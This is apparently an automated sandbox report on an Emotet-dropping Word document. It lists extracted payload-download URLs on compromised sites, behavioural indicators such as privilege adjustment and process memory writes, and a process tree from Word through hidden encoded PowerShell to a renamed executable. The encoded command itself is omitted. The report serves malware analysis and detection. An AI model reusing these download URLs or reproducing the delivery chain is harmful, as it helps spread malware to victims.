Analysis
max time kernel: 26s
resource: win10v191014
submitted: 15-01-2020 22:47
General
Malware Config
Extracted
http://lehraagrotech.com/wp-content/B/
http://emdgames.com/calendar/xos/
http://seca.infoavisos.com/wp-seca/f/
http://arx163.com/wp-admin/uw4/
http://youthplant.org/wp-admin/838/
Extracted
emotet
Signatures

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  4064  Powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process           procid_target
  PID 4064 wrote to memory of 4628  4064  Powershell.exe    80
  PID 4628 wrote to memory of 4704  4628  919.exe           81
  PID 4300 wrote to memory of 4280  4300  footerdispid.exe  83

Executes dropped EXE (4 IoCs)
  pid   Process
  4628  919.exe
  4704  919.exe
  4300  footerdispid.exe
  4280  footerdispid.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                              Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE

Process spawned unexpected child process (1 IoC)
  description                                                                          pid   pid_target  Process         procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  4064  1940        Powershell.exe  74

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   Process
  4896  WINWORD.EXE
  4628  919.exe
  4704  919.exe
  4300  footerdispid.exe
  4280  footerdispid.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  4064  Powershell.exe

Suspicious behavior: EmotetMutantsSpam (2 IoCs)
  pid   Process
  4704  919.exe
  4280  footerdispid.exe

Drops file in System32 directory (1 IoC)
  description   ioc                                                             Process
  File renamed  C:\Users\Admin\919.exe => C:\Windows\SysWOW64\footerdispid.exe  919.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                    Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0       WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  4896  WINWORD.EXE
Processes
(process tree; indentation shows parent/child, depth as given by the report)

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE  (PID 4896, depth 1)
  command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\54549c77150daeca5c7ccf7fe8c079fb75dc0640bd64cdb6f0295f9c2382e4c2.doc" /o ""
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  - Checks processor information in registry
  - Suspicious behavior: AddClipboardFormatListener

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe  (PID 4064, depth 1)
  command line: Powershell -w hidden -en [encoded command omitted]
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses

  C:\Users\Admin\919.exe  (PID 4628, depth 2)
    command line: "C:\Users\Admin\919.exe"
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

    C:\Users\Admin\919.exe  (PID 4704, depth 3)
      command line: C:\Users\Admin\919.exe --19646a5f
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious behavior: EmotetMutantsSpam
      - Drops file in System32 directory

C:\Windows\SysWOW64\footerdispid.exe  (PID 4300, depth 1)
  command line: "C:\Windows\SysWOW64\footerdispid.exe"
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

  C:\Windows\SysWOW64\footerdispid.exe  (PID 4280, depth 2)
    command line: C:\Windows\SysWOW64\footerdispid.exe --86b9e32a
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious behavior: EmotetMutantsSpam